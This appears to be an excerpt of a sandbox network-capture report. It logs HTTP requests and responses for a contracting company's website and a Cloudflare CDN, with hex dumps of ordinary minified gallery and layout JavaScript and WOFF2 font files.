                                              Data Ascii: (c){console.error("Make sure you have included videojs")}else d.pause();var n;n=o.core.s.dynamic?o.core.s.dynamicEl[l].src:o.core.$items.eq(l).attr("href")||o.core.$items.eq(l).attr("data-src");var m=o.core.isVideo(n,l)||{};(m.youtube||m.vimeo||m.dailymot
                                              2024-09-27 06:19:44 UTC8000INData Raw: 66 6f 72 28 76 61 72 20 67 3d 66 2e 69 73 42 6f 72 64 65 72 42 6f 78 3d 21 28 21 6b 7c 7c 21 62 5b 6b 5d 7c 7c 22 62 6f 72 64 65 72 2d 62 6f 78 22 21 3d 3d 62 5b 6b 5d 29 2c 6d 3d 30 2c 6e 3d 68 2e 6c 65 6e 67 74 68 3b 6e 3e 6d 3b 6d 2b 2b 29 7b 76 61 72 20 6f 3d 68 5b 6d 5d 2c 70 3d 62 5b 6f 5d 3b 70 3d 69 28 61 2c 70 29 3b 76 61 72 20 71 3d 70 61 72 73 65 46 6c 6f 61 74 28 70 29 3b 66 5b 6f 5d 3d 69 73 4e 61 4e 28 71 29 3f 30 3a 71 7d 76 61 72 20 72 3d 66 2e 70 61 64 64 69 6e 67 4c 65 66 74 2b 66 2e 70 61 64 64 69 6e 67 52 69 67 68 74 2c 73 3d 66 2e 70 61 64 64 69 6e 67 54 6f 70 2b 66 2e 70 61 64 64 69 6e 67 42 6f 74 74 6f 6d 2c 74 3d 66 2e 6d 61 72 67 69 6e 4c 65 66 74 2b 66 2e 6d 61 72 67 69 6e 52 69 67 68 74 2c 75 3d 66 2e 6d 61 72 67 69 6e 54 6f 70
                                              Data Ascii: for(var g=f.isBorderBox=!(!k||!b[k]||"border-box"!==b[k]),m=0,n=h.length;n>m;m++){var o=h[m],p=b[o];p=i(a,p);var q=parseFloat(p);f[o]=isNaN(q)?0:q}var r=f.paddingLeft+f.paddingRight,s=f.paddingTop+f.paddingBottom,t=f.marginLeft+f.marginRight,u=f.marginTop
                                              2024-09-27 06:19:44 UTC8000INData Raw: 70 61 72 73 65 49 6e 74 28 62 2c 31 30 29 2c 67 3d 65 3d 3d 3d 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2e 78 26 26 66 3d 3d 3d 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2e 79 3b 69 66 28 74 68 69 73 2e 73 65 74 50 6f 73 69 74 69 6f 6e 28 61 2c 62 29 2c 67 26 26 21 74 68 69 73 2e 69 73 54 72 61 6e 73 69 74 69 6f 6e 69 6e 67 29 72 65 74 75 72 6e 20 76 6f 69 64 20 74 68 69 73 2e 6c 61 79 6f 75 74 50 6f 73 69 74 69 6f 6e 28 29 3b 76 61 72 20 68 3d 61 2d 63 2c 69 3d 62 2d 64 2c 6a 3d 7b 7d 3b 6a 2e 74 72 61 6e 73 66 6f 72 6d 3d 74 68 69 73 2e 67 65 74 54 72 61 6e 73 6c 61 74 65 28 68 2c 69 29 2c 74 68 69 73 2e 74 72 61 6e 73 69 74 69 6f 6e 28 7b 74 6f 3a 6a 2c 6f 6e 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 68 69 73 2e 6c 61 79
                                              Data Ascii: parseInt(b,10),g=e===this.position.x&&f===this.position.y;if(this.setPosition(a,b),g&&!this.isTransitioning)return void this.layoutPosition();var h=a-c,i=b-d,j={};j.transform=this.getTranslate(h,i),this.transition({to:j,onTransitionEnd:{transform:this.lay
                                              2024-09-27 06:19:44 UTC8000INData Raw: 65 28 61 2c 64 29 7d 7d 2c 67 2e 70 72 6f 74 6f 74 79 70 65 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 62 3f 5b 62 5d 2e 63 6f 6e 63 61 74 28 63 29 3a 63 3b 69 66 28 74 68 69 73 2e 65 6d 69 74 45 76 65 6e 74 28 61 2c 64 29 2c 69 29 69 66 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 7c 7c 69 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 2c 62 29 7b 76 61 72 20 65 3d 69 2e 45 76 65 6e 74 28 62 29 3b 65 2e 74 79 70 65 3d 61 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 65 2c 63 29 7d 65 6c 73 65 20 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 61 2c 63 29 7d 2c 67 2e 70 72 6f 74 6f 74 79 70 65 2e 69 67 6e 6f 72 65
                                              Data Ascii: e(a,d)}},g.prototype.dispatchEvent=function(a,b,c){var d=b?[b].concat(c):c;if(this.emitEvent(a,d),i)if(this.$element=this.$element||i(this.element),b){var e=i.Event(b);e.type=a,this.$element.trigger(e,c)}else this.$element.trigger(a,c)},g.prototype.ignore
                                              2024-09-27 06:19:44 UTC8000INData Raw: 65 6c 65 6d 65 6e 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3a 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2c 63 3d 62 28 61 29 3b 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 57 69 64 74 68 3d 63 26 26 63 2e 69 6e 6e 65 72 57 69 64 74 68 7d 2c 64 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 67 65 74 49 74 65 6d 4c 61 79 6f 75 74 50 6f 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 67 65 74 53 69 7a 65 28 29 3b 76 61 72 20 62 3d 61 2e 73 69 7a 65 2e 6f 75 74 65 72 57 69 64 74 68 25 74 68 69 73 2e 63 6f 6c 75 6d 6e 57 69 64 74 68 2c 64 3d 62 26 26 31 3e 62 3f 22 72 6f 75 6e 64 22 3a 22 63 65 69 6c 22 2c 65 3d 4d 61 74 68 5b 64 5d 28 61 2e 73 69 7a 65 2e 6f 75 74 65 72 57 69 64 74 68 2f 74 68 69 73 2e 63 6f 6c 75 6d 6e 57 69 64 74 68 29 3b 65 3d 4d 61 74 68 2e 6d 69
                                              Data Ascii: element.parentNode:this.element,c=b(a);this.containerWidth=c&&c.innerWidth},d.prototype._getItemLayoutPosition=function(a){a.getSize();var b=a.size.outerWidth%this.columnWidth,d=b&&1>b?"round":"ceil",e=Math[d](a.size.outerWidth/this.columnWidth);e=Math.mi


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              44192.168.2.465334173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:45 UTC685OUTGET /fonts/sora/Sora-Bold.woff2 HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Origin: https://www.citydiamondcontracting.com
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: font
                                              Referer: https://www.citydiamondcontracting.com/css/yourstyle.css
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:45 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:45 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 30 Dec 2022 22:21:14 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 24540
                                              Connection: close
                                              Content-Type: font/woff2
                                              2024-09-27 06:19:45 UTC7931INData Raw: 77 4f 46 32 00 01 00 00 00 00 5f dc 00 0f 00 00 00 01 16 90 00 00 5f 7c 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 46 46 54 4d 1c 1a 78 1b 81 84 68 1c 96 78 06 60 00 87 16 11 08 0a 82 be 70 81 f6 43 0b 88 0a 00 01 36 02 24 03 90 10 04 20 05 8e 14 07 a0 02 1b 54 ed 77 30 8d 6b f7 27 fb 41 a0 db 10 a2 fd aa 5a 4b 1f bf 67 14 28 b7 5d 00 e7 f1 13 c2 90 91 8b 0e e4 b0 71 40 c6 d8 5f 5e f2 ff ff ff 9f 9a 6c 8c 61 07 da 81 64 b6 b2 ac f5 db 1e d4 8c 70 41 94 12 8e 32 57 14 2c 51 44 2b 58 5f b1 60 0d 84 89 15 ce d8 b0 a3 af c7 19 bd 62 4d e8 8b ab c4 6e 30 b9 33 db 48 bd e2 04 c5 fd 6e da 73 c0 c4 ea 2e de e2 cf 5d 33 cc 86 05 75 41 29 fe 0a 59 70 6a c7 47 7c 1f 51 db 23 cf 19 ae 3d 58 54 13 54 98 74 2a 5c 65 23 4c 6d f8 85 34 e9
                                              Data Ascii: wOF2__|?FFTMxhx`pC6$ Tw0k'AZKg(]q@_^ladpA2W,QD+X_`bMn03Hns.]3uA)YpjG|Q#=XTTt*\e#Lm4
                                              2024-09-27 06:19:45 UTC8000INData Raw: 5f 63 62 11 1b 6f 5f 81 b3 72 d7 7c ca 1f f2 2b a4 10 0c 11 2c 8a e7 f2 20 be 42 d8 b1 83 f7 36 bd 13 85 95 b1 3b 93 b6 ad 5d 05 0b c1 11 ed a7 bb 1e 55 51 08 c1 42 21 78 ca b6 d2 90 20 91 ab b5 86 6b 48 e2 05 e2 05 2b ac 93 70 7c 20 2c 72 ba cb a1 7b 91 0c d4 2a 0f e2 56 1c ec 54 9b b2 bf ff a1 59 04 a2 55 9a b5 c3 44 d4 36 ae 7e cc 71 c3 8a 48 51 e0 41 eb a0 ff 9b ca 9b da 5a 9c 4b 0a ab e8 5d 8a fd 66 b4 50 88 48 b7 12 5d 8a 1c cf 3a 26 88 ea 36 ba 92 b1 e7 1c b8 ae 1a ce 36 0f e8 e8 e1 c1 8d 7c 8b d3 90 23 c1 b6 15 de c1 95 27 80 ff f9 ff 29 c6 cd ef e7 d2 4e fe 05 98 93 59 5f e0 33 d0 e8 79 08 a7 af 1c f0 70 c7 49 a5 8c 3d b9 16 1e a7 4b a7 95 3e 29 8e 07 21 38 61 fd f3 2e a2 b8 b0 91 6b ec ef 86 4d dc 5c 9d 1b 73 6b 75 cd fb d6 b3 6b 8e ff c6 3e df
                                              Data Ascii: _cbo_r|+, B6;]UQB!x kH+p| ,r{*VTYUD6~qHQAZK]fPH]:&66|#')NY_3ypI=K>)!8a.kM\skuk>
                                              2024-09-27 06:19:45 UTC8000INData Raw: 4b e4 aa 0f f9 ed bf e4 49 d8 bc 24 8c 3c 09 93 37 62 1a ae f4 c9 0f cc f7 31 17 67 7c 9b b2 a0 f3 78 d0 08 18 df 6f 6a ae ef 7c 1f a3 39 61 52 03 26 ed 62 bf 2b a8 f3 43 bb 3a 84 c4 96 a4 9a 36 d1 28 12 df 6a b4 8e 7a 80 16 13 8b f3 cd 56 fe 26 e2 c0 b8 f4 24 e0 98 c4 b0 34 5b f1 8e 5e aa 3a b0 c9 42 7a ba 92 64 6b c2 a6 34 1b 3b 55 79 fb 36 60 e0 e9 fa 06 64 24 86 5a 0b 9a 80 1d a0 aa 5a ef b5 a2 9a 6a 05 2d 8c 28 a4 af 69 e3 5c 0b f5 a0 d1 a6 aa 38 6c 0c 5d 79 5b c4 4a 37 83 fe 17 30 11 93 2b 01 5e bf 75 28 b1 83 18 0e b1 17 09 0d 99 1a 39 1c 45 f2 b1 29 b0 9b 43 43 b2 a3 3d 91 7b 1c 4a 9a 93 73 0c 35 6b ed bc 82 02 dc bb 59 0f 09 99 52 6f ac ea 89 2f 80 2e 3f ff 12 9d 04 19 af db 38 6c 95 54 0a d3 86 bd 5d 1e 24 17 40 40 6b 0f 95 a0 e7 1e 74 2b 0a 83
                                              Data Ascii: KI$<7b1g|xoj|9aR&b+C:6(jzV&$4[^:Bzdk4;Uy6`d$ZZj-(i\8l]y[J70+^u(9E)CC={Js5kYRo/.?8lT]$@@kt+
                                              2024-09-27 06:19:45 UTC609INData Raw: a2 d0 8b fa 48 59 a8 29 00 3e d3 8c 0e 76 6e b4 9d e3 eb c3 33 51 32 29 46 52 15 61 cf 2a 69 f5 bc 3d e6 f7 d1 95 4c 55 9e 38 38 93 a9 d4 33 9a cb cf 1e e5 62 c6 37 9e bb ba 80 6d 36 3c f7 b2 d9 2e b1 67 bd 97 d8 16 79 8a ef 5a d3 83 a1 d3 1f 0c 67 49 60 a7 f0 ca 25 ec 81 0e 82 06 78 c9 d9 aa bd 73 ab dc 31 6d 6f 9b b2 31 ad 3c 0b 3d d3 ed 67 b9 fd a4 f1 f4 9a 7e 4f f7 74 fe 7b 8d d7 34 d0 e6 4e cf 0b a4 90 43 31 c0 84 24 42 23 a2 a5 4b 01 52 54 3f de 86 d5 18 b8 e6 d0 8e 30 29 2f 3a ae 84 bd e7 28 d1 21 c2 02 7c 61 c3 fc 05 ac b2 76 6d 82 54 04 aa 72 75 2a f4 e2 35 ac d8 84 f3 6b 78 48 d9 58 21 85 14 52 38 0a ed 3b 32 b0 5a 6a a9 87 ea 80 6c c3 56 ba ab df b1 75 a6 d4 b5 81 0c 86 5b e3 52 e1 24 76 9d 61 86 ba dc 91 3e 32 44 3f b9 3e d0 1c 3d 37 36 d2 79
                                              Data Ascii: HY)>vn3Q2)FRa*i=LU883b7m6<.gyZgI`%xs1mo1<=g~Ot{4NC1$B#KRT?0)/:(!|avmTru*5kxHX!R8;2ZjlVu[R$va>2D?>=76y


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              45192.168.2.465340104.17.25.144436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:45 UTC667OUTGET /ajax/libs/font-awesome/6.2.1/webfonts/fa-solid-900.woff2 HTTP/1.1
                                              Host: cdnjs.cloudflare.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Origin: https://www.citydiamondcontracting.com
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: font
                                              Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/css/all.min.css
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-09-27 06:19:45 UTC947INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:45 GMT
                                              Content-Type: application/octet-stream; charset=utf-8
                                              Content-Length: 150516
                                              Connection: close
                                              Access-Control-Allow-Origin: *
                                              Cache-Control: public, max-age=30672000
                                              ETag: "6373d4a6-24bf4"
                                              Last-Modified: Tue, 15 Nov 2022 18:04:22 GMT
                                              cf-cdnjs-via: cfworker/kv
                                              Cross-Origin-Resource-Policy: cross-origin
                                              Timing-Allow-Origin: *
                                              X-Content-Type-Options: nosniff
                                              CF-Cache-Status: HIT
                                              Age: 658979
                                              Expires: Wed, 17 Sep 2025 06:19:45 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RCyS34TqX0ShqnIoX10Hp%2FuQsSs%2BmiIGhik66epliL8INObmOpbKF2PzcDZdA4DVsZKgRbhWGSp0cexCBv%2FXhJx2r7hatcADdSxvSZYLddi0rPuK6hSChakJd78TNC6CIVYleCCe"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=15780000
                                              Server: cloudflare
                                              CF-RAY: 8c99624989e478db-EWR
                                              2024-09-27 06:19:45 UTC422INData Raw: 77 4f 46 32 00 01 00 00 00 02 4b f4 00 0a 00 00 00 05 c2 f0 00 02 4b a9 03 02 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 38 02 24 04 20 06 60 03 ab 3c 00 81 91 04 ca 95 94 04 cb ab 40 05 87 70 07 20 a5 77 e1 92 94 01 44 70 1e 00 00 d6 ea e7 61 44 8a 66 0f 2f 11 59 e7 ed 01 50 55 55 55 55 35 29 21 e0 31 db 76 00 aa aa 2a f8 d1 4f 7e f6 8b 5f fd e6 77 7f f8 d3 5f fe e6 ef fe e1 9f fe e5 df fe e3 bf fe e7 ff fe 4b 60 70 4c e0 3f 4c cb 76 5c 8f d7 e7 37 fc d7 2f fb 9d 7b 67 f7 87 34 8f 14 e7 fd 2c 0c 29 34 8a ac a2 04 85 45 38 aa c9 1e 85 30 18 df ca 81 31 c9 ad ff d8 df db 69 3b 10 92 9f be 73 07 f2 8a f2 4a d4 ca dc 35 37 03 41 45 18 4c 54 5c 36 e0 9e a4 bb b8 2f b2 7d 72 13 13 98 a9 0b 4c b4 ed 25 79 9d 7e 0d ec a0 52 1d 94 e4 a0
                                              Data Ascii: wOF2KK8$ `<@p wDpaDf/YPUUUU5)!1v*O~_w_K`pL?Lv\7/{g4,)4E801i;sJ57AELT\6/}rL%y~R
                                              2024-09-27 06:19:45 UTC1369INData Raw: 53 b5 ff fe cc fc 3f 7f ca ff 33 7d b7 cf ee 60 67 b0 68 5b 06 bb 03 10 04 b1 a4 58 40 51 12 a1 4a aa af 3a 55 6c c3 4d 92 ab d6 5d 2e b1 e0 16 cb 1d 8e 93 58 b2 cf 0e dd e5 aa 4d 77 ec 14 da 4e bf 12 a4 5c ce 69 3e 5d 72 89 7d b9 64 f9 ff a3 9a f6 ef 3e a2 3d 94 87 f2 50 58 44 12 20 44 42 14 25 11 14 44 42 1a 59 16 a6 6b 3c 9e 58 9e cd 8e 35 4e 63 9a 4b 2a bd ce 3a e3 54 a6 75 25 6e 93 ce ed e3 d8 67 8f d2 67 3b 7f 4f fa a4 75 6e 77 f2 9b d3 1a f4 f3 bc aa fa ef dc 31 df bb 6f 2c 00 0f e3 01 8f 00 c8 8d 41 00 a4 48 8a 90 6d 0d db 92 4d cb b2 2c d9 ae cd 4c 3b ce 52 96 ed 38 4d ca a4 69 c6 fa 4a 47 c6 64 d6 56 d6 66 92 ae e1 b6 7f a4 fd 4b 7f e7 37 7f b8 3b 5d b0 ff 3c 4e ad 3f f7 09 9e 24 4b b2 64 91 31 96 39 35 d4 72 4d 49 d1 05 82 9d f5 70 71 10 33 c4
                                              Data Ascii: S?3}`gh[X@QJ:UlM].XMwN\i>]r}d>=PXD DB%DBYk<X5NcK*:Tu%ngg;Ounw1o,AHmM,L;R8MiJGdVfK7;]<N?$Kd195rMIpq3
                                              2024-09-27 06:19:45 UTC1369INData Raw: 57 d4 6e f0 1c 7f 3f 44 69 14 87 a9 c1 da d1 3c da 35 e5 5e 6c 8c bd 0f 34 c3 32 a6 c2 3a e4 1d 26 e7 8f f7 43 18 be 97 b3 bc f9 94 4f 71 cc 77 70 5f dc d4 77 a5 9e 6c bc 82 39 17 77 13 ff b4 e3 bb b5 1b e2 0c 63 ce 31 cf eb 0a 9e d4 a8 d8 5a aa f8 a5 ae 4f bb af ef c0 c1 b1 3a 10 9c 35 e2 bf 38 38 f4 c3 62 5b a5 31 3f 2f 34 e4 ef 49 2a 56 48 56 f2 59 06 56 53 db 49 d1 d4 f5 e0 e6 cc 7b 2e ed 63 23 27 67 87 e9 e0 90 4e 2c 1b 5e 89 6c ad 9f 67 82 7c 05 75 94 08 a3 59 13 d4 8b 9f 1b d9 8f a2 53 e7 d9 af 7b 87 7d 35 93 3a 3d 91 f5 b5 ae 2b 90 a9 19 b7 e8 89 d6 b5 a9 0b 19 0f 75 e3 74 7e b8 1c c9 5c c0 0f e2 22 f5 d4 cf fa 30 7d 46 ea c0 c4 cf f4 59 13 e7 bc c9 1a 5b 3e be d0 9e ff 9c 6b 3f bd 88 03 5f 96 18 b7 a6 da d7 f6 7c ae fb 90 e4 d2 ea 09 a8 ae 03 13
                                              Data Ascii: Wn?Di<5^l42:&COqwp_wl9wc1ZO:588b[1?/4I*VHVYVSI{.c#'gN,^lg|uYS{}5:=+ut~\"0}FY[>k?_|
                                              2024-09-27 06:19:45 UTC1369INData Raw: 33 31 33 b3 33 07 73 32 17 f3 b1 28 4b b1 1c ab b1 3a eb b1 09 9b b2 25 db b1 2b 47 70 32 67 70 1e 17 70 31 97 72 19 97 73 25 d7 72 1f 0f f0 20 0f f3 34 6f f2 1e 5f f0 25 5f f1 35 df f1 0b 7f e4 6f fc 9d 7f f2 2f fe a7 88 8a ae d8 4a a7 bc 2a a6 92 aa a9 5a aa a7 06 6a ab 3e 1a ae 11 1a a5 d1 9a ac d9 9a a3 b9 9a a7 85 5a a4 a5 5a a5 35 5a a7 2d da a1 63 3a ae 93 3a a5 d3 3a a3 b3 3a a7 0b ba a4 cb ba a7 c7 7a a2 37 f2 fa aa ef f5 93 a4 df f4 a7 fe b3 a8 16 c7 d2 58 3a cb 61 85 ac 84 b5 b6 b6 d6 c1 3a db 44 9b 64 d3 6d 81 6d b5 f3 76 d1 ae da 4d bb 6f 0f ed ad 7d 30 6f 3f d9 df f6 af fd 1f a2 85 04 21 53 c8 12 b2 86 22 a1 58 28 15 ca 84 f2 a1 62 a8 1c aa 86 ea a1 76 90 87 b5 a8 0e d5 a7 26 d4 92 5a 53 3b ea 44 3d a9 1f 0d a0 a1 34 92 46 d3 38 9a 4c d3 69
                                              Data Ascii: 3133s2(K:%+Gp2gpp1rs%r 4o_%_5o/J*Zj>ZZ5Z-c::::z7X:a:DdmmvMo}0o?!S"X(bv&ZS;D=4F8Li
                                              2024-09-27 06:19:45 UTC1369INData Raw: ae 0d b8 96 6b ba 86 ab b9 2a e0 2a ae 0c b8 92 2b ba 82 53 e7 76 ae 7d fd 9e b3 3a 0b e0 cc ce e4 0c fa 4f ff 00 fd d5 4f 7d d5 27 bd 04 f4 02 d0 73 3d d3 63 dd 02 74 13 d0 0d 5d d7 55 5d d6 05 9d d3 49 9d d0 21 40 fb 01 ed d5 76 6d 06 b4 09 00 b4 0a d0 4a 40 cb 01 40 f3 01 cd d5 1c cd d2 78 40 63 01 8d 01 34 7a ed ff ec 3f 02 d0 10 0d 06 d4 47 bd d4 53 dd d5 55 9d d4 41 ed d4 4a cd d5 44 55 55 45 a5 01 15 e0 ff fc 8f 7f f9 07 00 78 8b 97 78 8c db b8 95 9b b8 9e 6b b8 9a 2b b8 8c 8b 38 9b e3 01 8e e1 30 f6 65 27 76 04 d8 84 8d d9 90 0d 58 8f 75 59 87 b5 59 8b d5 59 95 55 58 89 e5 58 9a a5 58 92 c5 58 94 85 59 88 09 c0 fc 78 08 cc 1a 98 25 30 34 30 24 30 38 30 28 d0 5f 84 7f f8 9d 9f f9 91 1f f8 9e ef f8 82 4f f8 88 0f 78 4f 84 27 98 29 c2 0c 11 a6 8b 30
                                              Data Ascii: k**+Sv}:OO}'s=ct]U]I!@vmJ@@x@c4z?GSUAJDUUExxk+80e'vXuYYYUXXXXYx%040$080(_OxO')0
                                              2024-09-27 06:19:45 UTC1369INData Raw: c2 bf 5e d4 f3 3c e7 f5 bd 89 37 f3 96 14 05 68 14 00 c0 fe 07 d2 40 1a 10 20 01 b2 80 02 75 80 ba 80 03 8d 80 d6 40 01 a0 1d 30 06 28 05 4c fe ab ca 03 53 54 05 60 aa aa 08 4c 53 95 80 e9 aa 32 30 43 55 01 66 aa aa c0 2c 55 0d 98 ad aa 03 73 54 0d 60 ae 4a 01 f3 54 1a 98 af 32 c0 02 95 00 0b 55 1e b0 48 65 81 c5 2a 07 2c 51 35 81 a5 aa 16 b0 4c d5 06 96 ab 3a c0 0a 55 17 58 a9 ea 01 ab 54 7d 60 b5 6a 00 ac 39 b0 21 70 31 74 2b 70 29 74 3b 70 25 f4 19 e0 6a 68 37 e0 3a 58 51 e0 36 e8 7d c0 dd d0 ee c0 eb 90 c3 c0 ef b0 cf 20 55 06 f2 36 a4 aa 42 07 42 aa 1a 74 10 a4 5a 43 7b 41 aa 0d b4 37 a4 2e 81 9e 0f a9 2b a0 db 20 75 25 74 27 a4 ae 82 be 01 a9 6b a0 5b 20 75 0b c2 47 90 ba 03 de 0c 52 f7 42 77 40 3a 03 2b 02 e9 43 90 57 20 7d 18 f2 1a a4 8f 40 5e 85
                                              Data Ascii: ^<7h@ u@0(LST`LS20CUf,UsT`JT2UHe*,Q5L:UXT}`j9!p1t+p)t;p%jh7:XQ6} U6BBtZC{A7.+ u%t'k[ uGRBw@:+CW }@^
                                              2024-09-27 06:19:45 UTC1369INData Raw: 1d ea 29 c4 c4 c4 a4 94 4b 88 c9 40 5b 8f 98 1c 6d 43 62 0a 94 cb 89 29 51 0f 24 a6 ea 50 ae 20 a6 25 96 a2 5c 49 2c 43 87 b6 12 b1 2c b1 02 e5 71 62 45 50 8f 24 56 ea 58 0f 23 56 26 d6 a2 3c 4d ac 43 6c de 97 ad 62 0b 51 de 22 b6 44 79 9b d8 aa a5 bc 4f 6c 43 ec 74 3e 50 c5 ce c2 48 c4 2e 28 9f 13 bb 8e 68 44 62 37 62 2f ca 17 c4 3e c4 51 94 6f 89 63 e8 50 82 38 9e 38 89 92 c4 c9 a0 9e 43 9c 82 7a 2e 71 2a ca cf c4 69 3a 6d b2 d3 9d c3 f2 0b 71 26 71 16 e5 57 e2 1c e2 5c ca ef c4 f9 c4 85 94 7f 13 17 81 3a 39 71 31 ca 6d c4 25 1d cb ff 88 2b 88 ab 28 ff 27 ae 21 ae 7d 50 71 15 d7 b9 13 d4 c5 89 eb 89 bb a8 23 10 f7 10 f7 51 c7 21 9e 21 de a2 8e 4f bc 43 bc 4b 9d 8e f8 88 f8 8a 3a 03 f1 0d 2d 75 4e e2 3b e2 fb 73 a1 2a 7e 10 23 5c 44 0c aa fc 81 68 29 3f
                                              Data Ascii: )K@[mCb)Q$P %\I,C,qbEP$VX#V&<MClbQ"DyOlCt>PH.(hDb7b/>QocP88Cz.q*i:mq&qW\:9q1m%+('!}Pq#Q!!OCK:-uN;s*~#\Dh)?
                                              2024-09-27 06:19:45 UTC1369INData Raw: da e2 b4 d3 88 bf 69 67 d0 2e a2 ac 40 bb 84 76 39 65 6d da 95 b4 6b 28 eb d3 ae a7 dd 46 d9 98 76 07 ed 4e ca d6 b4 bb 69 f7 52 b6 a5 dd 4f 7b 88 b2 03 ed 11 da 53 94 5d 68 cf d0 5e a0 ec 4d 7b 89 f6 32 e5 00 da ab b4 d7 29 07 d1 de 81 28 87 d2 de 17 e5 30 da 87 01 e5 70 da c7 b4 4f 28 47 d0 3e 43 94 a3 68 5f 8a 72 34 ed 1b 51 8e a1 fd 20 ca b1 b4 9f 03 ca 71 b4 7f 68 ff 52 8e a7 1f 84 28 27 d2 17 51 4e a2 1f 55 94 93 e9 c7 10 e5 14 fa f1 44 39 95 7e 12 51 4e a3 9f 6c 88 e5 74 fa 29 e9 a7 a2 9c 41 3f 1d fd f4 94 b3 e8 67 a6 9f 95 72 0e fd 3c 04 94 f3 e5 21 39 1f 39 3f 71 1e b9 08 22 2e 20 17 17 71 21 b9 94 88 8b c8 65 45 5c 4c ae 24 e2 12 72 95 80 b8 94 5c 8d 5c 83 b8 8c 5c 9b 80 b8 92 dc 80 dc 90 b8 8a dc 94 9a 71 0d b9 39 b9 25 71 2d b9 0d b9 1d 71 03
                                              Data Ascii: ig.@v9emk(FvNiRO{S]h^M{2)(0pO(G>Ch_r4Q qhR('QNUD9~QNlt)A?gr<!99?q". q!eE\L$r\\\q9%q-q
                                              2024-09-27 06:19:45 UTC1369INData Raw: 9f 50 7c 82 e8 67 14 9f 22 ee 38 14 9f 26 6e 1d 8a cf 18 dd 8b 12 3f 15 c5 97 88 f6 a1 f8 32 f1 35 51 7c 85 b8 fa 28 be 4a fc 7f 28 be 45 74 3d 8a ef 10 ff 36 8a 1f 11 fb 1e c5 8f 89 9f 8c e2 27 44 ff a2 f8 29 29 26 a2 f8 19 71 57 a3 f8 39 29 da a3 f8 05 71 1e c5 6f 88 3f 0e c5 df 88 7b 16 c5 df 89 5f 85 62 26 3a 1b c5 7d 44 bf a3 f8 f7 78 8a 8d 37 25 f7 53 02 f4 35 4a 92 f8 f9 28 19 f1 43 51 2a 47 74 25 4a 15 88 ae 42 a9 22 71 11 a5 4a c4 3d 83 52 65 a2 e3 50 aa 4e f4 07 4a 35 88 2e 45 a9 26 d1 ff 28 d5 22 6e 20 4a b5 89 7b 01 a5 3a 44 37 a0 54 97 b8 5a 28 d5 23 ee 62 94 5a 13 7d 8a 52 5b e2 aa a0 d4 8e d8 87 28 75 22 76 0a 4a bd 88 9b 81 52 6f 13 dc 58 89 5d 85 d2 78 62 77 a3 34 81 f8 9b 51 9a 48 ec 56 94 26 11 bb 0b a5 c9 c4 9e 42 69 0a b1 8f 50 9a 49
                                              Data Ascii: P|g"8&n?25Q|(J(Et=6'D))&qW9)qo?{_b&:}Dx7%S5J(CQ*Gt%JB"qJ=RePNJ5.E&("n J{:D7TZ(#bZ}R[(u"vJRoX]xbw4QHV&BiPI
